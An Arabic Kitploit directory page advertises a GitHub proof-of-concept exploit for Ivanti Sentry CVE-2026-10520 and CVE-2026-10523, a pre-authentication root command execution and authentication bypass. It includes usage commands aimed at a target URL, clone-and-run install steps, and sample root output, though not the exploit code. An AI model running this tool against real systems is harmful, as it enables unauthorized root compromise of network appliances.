Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-10520 — CVE-2026-10520 | Kitploit
أدوات/GitHubGitHub/0xblackash/cve-2026-10520
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHub0xblackash/cve-2026-10520

CVE-2026-10520

CVE-2026-10520

عرض المستودع
450منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🎯 CVE-2026-10520 & CVE-2026-10523 - Ivanti Sentry

صورة ChatGPT في 11 يونيو 2026، 11:19:12 صباحًا

Ivanti Sentry Critical RCE

تنفيذ الأوامر عن بُعد بدون مصادقة + تجاوز المصادقة

المؤلف: Ashraf Zaryouh "0xBlackash"

GitHub


📌 نظرة عامة

ثغرتان أمنيتان حرجتان تؤثران على Ivanti Sentry (المعروف سابقًا بـ MobileIron Sentry):

  • CVE-2026-10520 → CVSS 10.0 - حقن أوامر نظام بدون مصادقة (RCE كجذر)
  • CVE-2026-10523 → CVSS 9.9 - تجاوز المصادقة

تسمح هذه الثغرات للمهاجمين غير المصادق عليهم بالوصول الكامل إلى النظام.


✨ المميزات

  • ✅ إثبات مفهوم نظيف وسريع
  • ✅ بدون مصادقة (لا حاجة لبيانات اعتماد)
  • ✅ تنفيذ أوامر بمستوى الجذر
  • ✅ تنسيق مخرجات مفصل
  • ✅ دعم الوكيل (Proxy)
  • ✅ وضع الإسهاب (Verbose)
  • ✅ واجهة طرفية جميلة

🚀 الاستخدام

root@kitploit:~
python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>

أمثلة

root@kitploit:~
# الاستخدام الأساسي
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"

# وضع الإسهاب
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v

# مع وكيل
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080

# التحقق من النواة
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"

📋 الخيارات


🛠️ التثبيت

root@kitploit:~
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py

📷 استغلال ناجح

عندما يكون الهدف معرضًا للخطر، سترى:

root@kitploit:~

 ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
 ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
  
          CVE-2026-10520 & CVE-2026-10523 PoC Exploit
          Ivanti Sentry Pre-Auth RCE + Auth Bypass
          
          Author: Ashraf Zaryouh "0xBlackash"
          GitHub: https://github.com/0xBlackash


[+] Target is VULNERABLE!
Command Output:
uid=0(root) gid=0(root) groups=0(root)

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية واختبارات الأمان المصرح بها فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها غير قانوني.
المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام.


🔧 الإصدارات المتأثرة

  • Ivanti Sentry قبل 10.5.2، 10.6.2، 10.7.1

تم الإصلاح في: 10.5.2 / 10.6.2 / 10.7.1


📜 المراجع

  • نشرة Ivanti الرسمية
  • البحث الأصلي لـ watchTowr Labs
  • مدخلات NVD: CVE-2026-10520, CVE-2026-10523

تم الإنشاء بـ ❤️ بواسطة Ashraf Zaryouh "0xBlackash"

قم بتمييز المستودع بنجمة إذا وجدته مفيدًا! ⭐

تنزيل الأداة
الوسيطالوصفمطلوب
--urlعنوان الهدف (مثل https://target:8443)نعم
--cmdالأمر المطلوب تنفيذهنعم
-v, --verboseتفعيل الإخراج المفصللا
--proxyوكيل HTTP (host:port)لا